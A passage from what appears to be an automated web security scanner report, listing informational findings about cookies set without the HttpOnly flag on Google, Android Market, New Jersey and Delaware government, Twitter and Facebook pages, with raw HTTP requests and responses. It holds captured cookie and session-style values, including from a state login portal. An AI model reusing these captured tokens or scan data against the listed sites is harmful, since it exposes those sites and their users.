Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache
Set-Cookie: 9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:52:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 53784
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

7.29. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

7.30. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

7.31. https://market.android.com/reviews/components  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /reviews/components

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /reviews/components HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.avai.amp.pbn_delaware
Content-Length: 339
Origin: https://market.android.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

req={"appId":54,"reqId":"1310522401955-0.8032410256564617","hl":"en_US","js":true,"specs":[{"type":"0","url":"3","groups":"4","id":"1"},{"type":"0","url":"3","groups":"4","id":"2"}],"internedKeys":["0
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: PREF=ID=9cae866da36d6f34:U=c20011dc93789892:TM=1310522402:LM=1310522420:S=mLzmlvNZoj-H6Lpz; expires=Fri, 12-Jul-2013 02:00:20 GMT; path=/; domain=market.android.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: zfe
Content-Length: 1308
X-XSS-Protection: 1; mode=block

window.google.annotations2.component.load({'1':{'augmentor':function(){var h=window.google.annotations2.component;var k=function(e,b,d,c){for(var g=0,a;a=e.childNodes[g];++g)if(a.nodeType==1){var f=a.
...[SNIP]...

7.32. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.register.com
Path:   /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2? HTTP/1.1
Host: oascentral.register.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:39:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW804dg/MAAlLm; expires=Sat, 13-Jul-13 11:39:31 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11791
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write ('<!-- -- START: POP TYPE CONTROLS -- --> \n');
docume
...[SNIP]...

7.33. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http://portal20.sa.state.nj.us:8080/amserver/UI/Login?gw=portal01.state.nj.us&org=snj HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:04 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: Mozilla
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

7.34. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

7.35. http://sdc.state.nj.us/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.state.nj.us
Path:   /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif?&dcsdat=1310521241276&dcssip=www.state.nj.us&dcsuri=/patentbank/&dcsref=http://nj.gov/&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=State%20of%20New%20Jersey%20|%20Patent%20Bank&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x823&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.state.nj.us/patentbank/&WT.cg_n=example&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: sdc.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/patentbank/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAABAAAAAgAAABX3HE4V9xxOAQAAAAEAAAAV9xxOFfccTgAAAAA-

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:5f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAACAAAAAgAAABX3HE4V9xxOAQAAAJ/3HE6Z9xxOAQAAAAEAAACf9xxOFfccTgEAAAABAAAAIzE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3; path=/; expires=Sat, 10-Jul-2021 01:40:47 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Wed, 13 Jul 2011 01:40:46 GMT
Connection: close

GIF89a.............!.......,...........D..;

7.36. http://sdc.state.nj.us/dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.state.nj.us
Path:   /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs9ir25300000ggffs6h6i8r_2f2e/dcs.gif?&dcsdat=1310521108529&dcssip=nj.gov&dcsuri=/&WT.co_f=173.193.214.243-2429894688.30163197&WT.vtid=173.193.214.243-2429894688.30163197&WT.vtvs=1310521108532&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=The%20Official%20Web%20Site%20for%20The%20State%20of%20New%20Jersey&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x823&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.z_url=/&WT.z_domain=nj.gov&WT.es=nj.gov/&WT.cg_n=example&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: sdc.state.nj.us
Proxy-Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:610"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAABAAAAAgAAABX3HE4V9xxOAQAAAAEAAAAV9xxOFfccTgAAAAA-; path=/; expires=Sat, 10-Jul-2021 01:38:29 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Wed, 13 Jul 2011 01:38:28 GMT
Connection: close

GIF89a.............!.......,...........D..;

7.37. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=knockPage&page=http%3A//www.delaware.gov/apps/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=5808447995&scriptVersion=1.1&d=1310522362808&title=Delaware.gov%20--%20Mobile%20Apps%20for%20iPhone%20and%20Android&referrer=http%3A//www.delaware.gov/ HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/apps/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=2985234093551245539; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1310522362451

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:59:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=4932709835118299835; path=/hc/33511087
Set-Cookie: HumanClickACTIVE=1310522364563; expires=Thu, 14-Jul-2011 01:59:24 GMT; path=/
Content-Type: image/gif
Last-Modified: Wed, 13 Jul 2011 01:59:24 GMT
Cache-Control: private
Content-Length: 34

GIF89aZ............,...........L.;

7.38. http://server.iad.liveperson.net/hc/33511087/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/?visitor=&msessionkey=&site=33511087&cmd=knockPage&page=http%3A//www.delaware.gov/apps/&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=&javaSupport=true&id=7068719814&scriptVersion=1.1&d=1310522436147&title=Delaware.gov%20--%20Mobile%20Apps%20for%20iPhone%20and%20Android&referrer=http%3A//itunes.apple.com/us/app/delaware-gov/id444422872 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/apps/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5099524182751471388; LivePersonID=-16101514677756-1310522366:-1:-1:-1:-1; HumanClickSiteContainerID_33511087=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1310522363550

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:00:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1310522436862; expires=Thu, 14-Jul-2011 02:00:36 GMT; path=/
Content-Type: image/gif
Last-Modified: Wed, 13 Jul 2011 02:00:36 GMT
Cache-Control: private
Set-Cookie: HumanClickSiteContainerID_33511087=STANDALONE; path=/hc/33511087
Content-Length: 34

GIF89aZ............,...........L.;

7.39. http://server.iad.liveperson.net/hc/33511087/x.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/33511087/x.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/33511087/x.js?cmd=file&file=chatScript3&site=33511087 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.delaware.gov/apps/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:59:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1310522363490; expires=Thu, 14-Jul-2011 01:59:23 GMT; path=/
Set-Cookie: HumanClickKEY=4061358983041699324; path=/hc/33511087
Cache-Control: max-age=900
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 13 Jul 2011 01:59:23 GMT
Content-Length: 33369

var SCRIPT_VERSION = "1.1";

if (typeof(lpNumber) == "undefined")
lpNumber = '33511087';

var lpUseFirstParty = ("true" == "false");
var lpUseSecureCookies = ("true" == "false");
var lpUseSessionC
...[SNIP]...

7.40. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif?&dcsdat=1310522349692&dcssip=de.gov&dcsuri=/&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Delaware.gov%20--%20The%20Official%20Website%20of%20the%20First%20State&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x823&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=de.gov/&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAAOAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1ODAAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:59:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAAPAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAO77HE7u+xxODQAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAADu+xxO7vscTgAAAAA-; path=/; expires=Sat, 10-Jul-2021 01:59:10 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

7.41. http://twitter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310521875-90449-3159
ETag: "85527ad242b776a506d5d88b053c21da"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:51:15 GMT
X-Runtime: 0.01211
Content-Type: text/html; charset=utf-8
Content-Length: 50437
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 47f8e2ed085eaed7e4648c027947ab8baa7aa28c
Set-Cookie: k=173.193.214.243.1310521875602718; path=/; expires=Wed, 20-Jul-11 01:51:15 GMT; domain=.twitter.com
Set-Cookie: guest_id=v1%3A131052187562584923; domain=.twitter.com; path=/; expires=Fri, 12 Jul 2013 13:51:15 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKvcMCExAToHaWQiJTBhODMxZjBmYjMyMjIx%250AMzFlNTk1NDRhNDIzZmVhYTgwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--53400218b1904fe1c703d7d2b21d9ca4aa243e52; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...

7.42. http://www.facebook.com/NewJerseyLottery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /NewJerseyLottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewJerseyLottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=I_ocTk6Zw7qrIicWqdkAsyEn; expires=Fri, 12-Jul-2013 01:51:31 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=pn98H; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FNewJerseyLottery; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.42
Connection: close
Date: Wed, 13 Jul 2011 01:51:31 GMT
Content-Length: 34241

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...

7.43. http://www.facebook.com/feeds/page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /feeds/page.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feeds/page.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private, no-cache, no-store, must-revalidate
Content-type: text
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Tue, 12 Jul 2011 18:51:31 -0700
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=r-8ny; path=/; domain=.facebook.com
X-FB-Server: 10.54.49.57
Connection: close
Date: Wed, 13 Jul 2011 01:51:31 GMT
Content-Length: 1443

